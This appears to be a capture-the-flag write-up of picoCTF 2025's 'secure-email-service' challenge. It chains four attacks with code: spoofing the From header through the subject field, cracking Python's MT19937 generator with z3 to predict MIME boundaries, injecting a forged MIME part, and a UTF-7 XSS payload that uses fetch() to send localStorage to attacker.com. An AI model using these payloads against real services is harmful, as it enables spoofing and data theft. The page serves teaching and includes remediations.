Description

A Flask email service signs messages with S/MIME. Chain four bugs - email header injection, Mersenne Twister RNG cracking, MIME boundary injection, and UTF-7 XSS - to make the admin bot sign and view a malicious HTML email, then steal the flag from localStorage.

Setup

Download secure-email-service.tar

Unpack and run the Docker stack locally: tar -xvf secure-email-service.tar && docker compose up --build. Local debugging is faster than poking the remote instance because you can print() from the Flask app.

Log in as user@ses with the provided credentials and walk the send/reply flow once so you know exactly which form fields you control.

Open app/views.py (or equivalent) and search for Subject, boundary, and the admin-bot URL handler. Note the exact line where the subject string is concatenated into the email and where random.randrange is called.

bash

tar -xvf secure-email-service.tar

bash

docker compose up --build

bash

# Log in: user@ses / <provided password>

bash

grep -rn 'boundary\|randrange\|Subject' app/ src/

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it

Big-picture before the steps: the admin bot logs itself in automatically whenever you trigger it, and the flag lives in that logged-in admin's browser localStorage. Everything below is in service of getting JavaScript to run inside the admin's post-login session so it can read that key and ship it to your collector.

Step 1
Inject a From header via the subject field
Observation
I noticed the server concatenates the user-supplied subject directly into the raw email header string without sanitization, which suggested that injecting a newline followed by 'From :admin@ses' (using Python's space-before-colon parser quirk) would spoof the sender address seen by the admin bot.
The server inserts the user-supplied subject directly into the email headers. Python 3.11's email module accepts header names containing a space before the colon, so From :admin@ses is parsed as a separate From header rather than part of the subject. Inject a newline followed by From :admin@ses (note the space before the colon) in your subject to spoof the sender address when the admin bot views and replies to your message.
bash
# Subject value to inject: # 'Hello\nFrom :admin@ses' # Or base64-encoded in RFC 2047 format to survive header folding: # '=?ISO-8859-1?B?<base64 of Hello\nFrom :admin@ses>?='
What didn't work first
Tried: Inject From: without the space before the colon (e.g. subject value 'Hello\nFrom:admin@ses') to spoof the sender.
Python 3.11's email module rejects a raw injected 'From:' header added this way because it treats the colon as part of a folded subject continuation rather than a new header name boundary. The space-before-colon quirk ('From :') is what causes the parser to treat the injected text as a new header instead of folded subject content. Without that space the injection silently fails and the admin sees only the garbled subject, never a forged sender.
Tried: Send the newline injection as a literal \r\n in the HTTP form body without RFC 2047 base64 wrapping.
Flask and most WSGI servers strip or reject raw CRLF sequences in form fields before they reach application code, and the email library's header-encoding path may additionally escape newlines it receives from validated inputs. Wrapping the payload as an RFC 2047 encoded-word (=?ISO-8859-1?B?...?=) moves the newline into the base64 payload, which the HTTP layer cannot inspect, and forces the decoding to happen only inside the email parser where it becomes an actual header separator.
Learn more
Email header injection exploits the fact that HTTP headers and email headers both use newline sequences as delimiters. If a web form inserts user input directly into an email header field (such as the Subject), an attacker can include a newline character (\r\n or just \n) to start a new header. The email library then parses the injected text as a legitimate additional header.
The space-before-colon bypass exploits a quirk in Python's email library: a header name of From : (with a trailing space) passes validation checks that reject From: in certain contexts, yet the email parser treats it as a separate From header when rendering the message. This kind of parser inconsistency is common in format-parsing libraries and is the source of many security vulnerabilities; a checker and a renderer that agree on most inputs but diverge at edge cases create an exploitable gap.
RFC 2047 encoded-word syntax (=?charset?encoding?text?=) allows non-ASCII content and binary data in email headers. Base64-encoding a payload as an encoded word smuggles newlines past simple string validation that looks for literal \n characters. The email client decodes the encoded word before displaying it to the user, revealing the hidden newline and the injected header.
Step 2
Predict the next MIME boundary via MT19937
Observation
I noticed the app generates MIME boundaries using Python's non-cryptographic 'random.randrange(sys.maxsize)', which is a seeded MT19937 PRNG whose full internal state can be reconstructed from enough observed outputs; this suggested collecting ~800 boundary integers and using a z3-based symbolic solver to predict the next boundary needed for the MIME injection.
The application generates multipart MIME boundaries using Python's random.randrange(sys.maxsize). On a 64-bit system sys.maxsize is 2^63 - 1, so randrange internally calls getrandbits(63), which consumes two 32-bit MT19937 words and discards the lowest bit of one of them. The result is a 63-bit value where you observe 32 bits cleanly from one word and only 31 bits from the other (the lost bit is unknown). Standard tools like randcrack require full 32-bit outputs and cannot handle the missing bit. Instead, send approximately 800 emails, split each 63-bit boundary into its two MT word contributions (a 31-bit half and a 32-bit half), mark the unknown bit with a placeholder, and feed all observations to a z3-based symbolic solver that can recover the MT state despite the missing information. Once the state is recovered, predict the next boundary value and verify it matches before crafting the exploit.
bash
pip install z3-solver requests tqdm
bash
# Download the symbolic solver: # git clone https://github.com/icemonster/symbolic_mersenne_cracker.git # import z3_crack from that repo as 'ut = z3_crack.Untwister()' # Concrete extraction skeleton: # import sys, tqdm, z3_crack # ut = z3_crack.Untwister() # for _ in tqdm.tqdm(range(800)): # boundary_int = get_boundary(session) # read integer from MIME header # b = bin(boundary_int)[2:].zfill(63) # 63-bit binary string # half1, half2 = b[:31], b[31:] # 31 bits | 32 bits # half1 = half1 + '?' # mark the one unknown bit # ut.submit(half2) # submit 32-bit half first # ut.submit(half1) # submit 31-bit half with unknown # r2 = ut.get_random() # z3 solves for MT state # predicted = r2.getrandbits(63) # next boundary value
What didn't work first
Tried: Use the randcrack library instead of symbolic_mersenne_cracker to recover the MT19937 state from collected boundary values.
randcrack requires exactly 32-bit outputs from random.getrandbits(32). Each MIME boundary comes from random.getrandbits(63), which internally consumes two 32-bit MT words but discards the lowest bit of one of them before returning. randcrack has no mechanism to handle that missing bit - it needs full, untruncated 32-bit words. Feeding the split halves raw into randcrack produces a constraint system it cannot satisfy, so it either hangs or returns garbage state that predicts wrong boundaries.
Tried: Collect only 624 boundaries (the classical MT state size) before attempting to crack the RNG state.
Each 63-bit boundary contributes one full 32-bit word and one 31-bit word with an unknown bit. The unknown bit means each boundary provides slightly less than two full words of constraint. The z3 solver needs the constraint system to be over-determined before it can unambiguously resolve all 624 internal state words and the free unknown-bit variables. With only 624 observations the system is under-constrained and z3 either times out or returns multiple candidate states, making boundary prediction unreliable. Around 800 observations is the empirical threshold where the system becomes fully determined.
Learn more
The Mersenne Twister (MT19937) is Python's default PRNG (used by the random module). It has a period of 2^19937 - 1 and passes most statistical tests, but it is not cryptographically secure: its internal state of 624 32-bit words is completely determined by 624 consecutive outputs. Once the state is known, all future and past outputs are predictable. This makes it unsuitable for any security-sensitive application; use secrets.token_bytes() or os.urandom() instead.
The reason standard randcrack fails here is subtle. CPython's getrandbits(63) generates two 32-bit MT words, concatenates them into a 64-bit value, and then right-shifts by one to produce 63 bits. The shift discards the lowest bit of the second word, so one bit of MT state information is permanently lost per boundary observation. Randcrack requires exact 32-bit values and has no mechanism for unknown bits, so it cannot reconstruct state from these partial observations. The symbolic_mersenne_cracker library uses z3 to model each MT word as a symbolic bitvector and each observation as a set of constraints. The unknown bit becomes a free variable that z3 resolves while solving the full 624-word system. After 800 observations the constraint set is over-determined and z3 recovers the exact internal state.
Predicting the MIME boundary is necessary because the exploit injects a forged MIME boundary into the email subject. For the injection to be interpreted correctly by the admin's email parser, the injected boundary string must exactly match what the server generates for the signed reply. Without the correct boundary, the injected MIME part is not recognized and the XSS payload does not execute. See Python for CTF for the scripting patterns used here.
Step 3
UTF-7 XSS via the predicted MIME boundary
Observation
I noticed the server's HTML sanitizer operates on the raw bytes before rendering, so a payload using UTF-7 encoding arrives as ASCII-safe '+ADw-img...' strings with no visible angle brackets, which suggested declaring 'charset=utf-7' in the injected MIME part to slip the XSS payload past sanitization and have the admin's email client decode the angle brackets only at render time.
Craft an email subject that uses the RFC 2047 encoded-word format to inject newlines and include a forged second MIME part. The injected part declares Content-Type: text/html; charset=utf-7 and contains a UTF-7-encoded XSS payload. Because HTML escaping operates on the UTF-8 representation, it does not neutralize the UTF-7 encoding of < and >. When the admin bot's email client renders the reply and decodes the UTF-7 charset, the HTML is parsed and the script executes.
js
# 1. Generate the UTF-7 bytes from Python: # payload = b"<img src=x onerror=fetch('https://attacker.com/?c='+localStorage.getItem('flag'))>" # utf7 = payload.decode('utf-8').encode('utf-7') # produces +ADw-img src=x onerror=fetch(...)+AD4- # 2. Build the injected MIME part using the predicted boundary: # injected = (b'\r\n--' + predicted + b'\r\nContent-Type: text/html; charset=utf-7\r\n\r\n' + utf7 + b'\r\n--' + predicted + b'--') # 3. Wrap a newline + the injected boundary line in an RFC 2047 encoded-word # so the smuggle survives header validation: # import base64 # smuggle = b'\n' + injected # subject_header = b'=?ISO-8859-1?B?' + base64.b64encode(smuggle) + b'?=' # Send subject_header as the Subject field; the email parser decodes it, # sees the literal newline, and treats everything after as appended body parts.
Expected output
```
b'+ADw-img src=x onerror=fetch(\'https://attacker.com/?c=\'+localStorage.getItem(\'flag\'))+AD4-'
```
What didn't work first
Tried: Inject the XSS payload as a UTF-8 encoded text/html MIME part rather than declaring charset=utf-7.
A UTF-8 HTML part with literal angle brackets will be processed by the server's HTML sanitizer before signing, which strips or escapes script-capable tags like img with onerror. Declaring charset=utf-7 causes the payload to arrive at the sanitizer as the ASCII-safe sequence '+ADw-img...' with no angle brackets present, so the sanitizer sees no HTML to strip. The angle brackets only materialize when the admin's email client decodes the UTF-7 charset during rendering, at which point sanitization has already passed.
Tried: Use the approximate predicted boundary value but off by one (predicted + 1 or predicted - 1) when constructing the injected MIME part.
The multipart MIME parser requires the injected '--boundary' delimiter to exactly match the Content-Type boundary parameter character for character. Even a one-digit difference causes the parser to treat the injected section as raw text appended to the existing MIME part rather than as a new MIME boundary. The HTML part is never recognized, no charset is decoded, and the XSS payload never executes. The boundary prediction must be exact, which is why the z3 solver step verifies the first predicted value against an observed email before building the final exploit.
Learn more
UTF-7 is a Unicode encoding that represents non-ASCII characters using only 7-bit ASCII. It encodes characters using + as an escape prefix: the sequence +ADw- decodes to < and +AD4- decodes to >. You don't hand-write these escapes; the command above does it with one Python call (payload.decode('utf-8').encode('utf-7')) and the leading +ADw- in the output is exactly the < of <img>. Standard HTML sanitisers operate on the decoded Unicode string, but if the sanitiser receives the raw bytes and the browser decodes them afterwards, the angle brackets survive unsanitised.
The attack chain at this step is: inject a new MIME part into the signed email (using the predicted boundary), declare its charset as UTF-7, and put an <img onerror=...> payload in UTF-7 encoding inside that part. The email server signs the entire multipart message including the injected part. When the admin bot views its own signed reply, the email client renders the HTML part, decodes UTF-7 to Unicode, parses the angle brackets as HTML, and executes the JavaScript in the onerror handler. See XSS for CTF for the broader payload toolbox.
The XSS payload calls localStorage.getItem('flag') because the challenge application stores the flag in the admin's browser localStorage after a successful sign-in, and the admin bot runs in a headless browser context that persists localStorage between email views. The payload exfiltrates the flag value to an attacker-controlled server via a fetch() call or an image src attribution.
Step 4
Trigger the XSS and collect the flag
Observation
I noticed the challenge description states the flag lives in the admin bot's browser localStorage after login, which suggested the XSS payload should call 'localStorage.getItem("flag")' and exfiltrate the value to an attacker-controlled server via a fetch request.
Send the crafted email to the admin bot's address. The bot receives it, views the body (triggering the XSS), and the payload exfiltrates localStorage to your server. The flag value is picoCTF{always_a_step_ahead_...}.
Learn more
This challenge is rated as one of the hardest in picoCTF 2025; fewer than 10 of the ~10,000 participating teams solved it during the competition. The exploit chain requires understanding five distinct technical areas simultaneously: email header parsing edge cases, Python's PRNG internals, MIME structure, charset encoding, and XSS attack vectors. Each individual step is a known technique, but chaining them all correctly is genuinely difficult.
The broader lesson is that defense in depth requires every component of a system to be secure. S/MIME provides a valid cryptographic signature; the emails are authenticated. But authentication alone does not prevent the content of an authenticated email from being malicious. The vulnerability is not in the cryptography; it is in the application logic that trusts user-supplied header fields and in the email client that renders HTML with a dangerous charset. Secure systems must validate at every trust boundary, not just at the authentication layer.
Remediation for this challenge would require: (1) use email.headerregistry to safely encode subject values rather than string interpolation, (2) replace random with secrets for boundary generation, (3) sanitize HTML email content before rendering in the admin client, and (4) store the flag in an HttpOnly cookie or server-side session rather than localStorage. The cookies and JWT guide expands on point 4.

Interactive tools

Strings ExtractorPull printable text from any binary, library, or image. ASCII and UTF-16 detection, configurable minimum length, flag-like highlight, no command line needed.
JWT DecoderDecode JSON Web Tokens and inspect the header, payload, and signature. Useful for web exploitation challenges.
Flask Session DecoderDecode Flask / itsdangerous session cookies. Splits payload, decompresses zlib, parses JSON, and verifies the HMAC signature when given the secret.

Flag

Reveal flag

picoCTF{always_a_step_ahead_...}

Chain: subject header injection (From: spoofing) → MT19937 RNG crack (~800 boundaries) → inject UTF-7 HTML MIME part using predicted boundary → XSS exfiltrates localStorage flag.

Key takeaway

Defense in depth requires every component of a system to be independently secure; valid S/MIME signatures authenticate the sender but cannot prevent malicious content when the application layer has unsanitized headers, a weak PRNG for MIME boundaries, and a client that renders UTF-7 HTML without sanitization. Chaining four separate vulnerabilities into a single exploit is the pattern that characterizes high-difficulty real-world attacks - each bug looks manageable in isolation, but the composition is critical.

secure-email-service picoCTF 2025 Solution

Description

Solution

Flag

Key takeaway

Related reading

Useful tools for Web Exploitation

What to try next

triple-secure

Search source

byp4ss3d

Secure Password Database

Insp3ct0r

WebSockFish